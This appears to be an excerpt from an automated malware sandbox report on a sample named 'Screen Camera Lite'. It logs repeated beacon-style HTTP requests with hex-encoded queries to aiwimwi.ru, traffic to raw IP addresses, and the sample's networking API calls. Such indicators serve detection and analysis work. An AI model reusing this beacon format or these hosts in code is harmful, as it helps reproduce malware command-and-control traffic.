        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownTCP traffic detected without corresponding DNS query: 89.105.201.183
        Source: unknownUDP traffic detected without corresponding DNS query: 141.98.234.31
        Source: C:\Users\user\AppData\Local\Screen Camera Lite\screencameralite32_64.exeCode function: 2_2_02C772AB Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,RtlEnterCriticalSection,RtlLeaveCriticalSection,_sprintf,RtlEnterCriticalSection,RtlLeaveCriticalSection,_malloc,_free,2_2_02C772AB
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf713c6ea96983f HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d983dc86c9412 HTTP/1.1Host: aiwimwi.ruUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
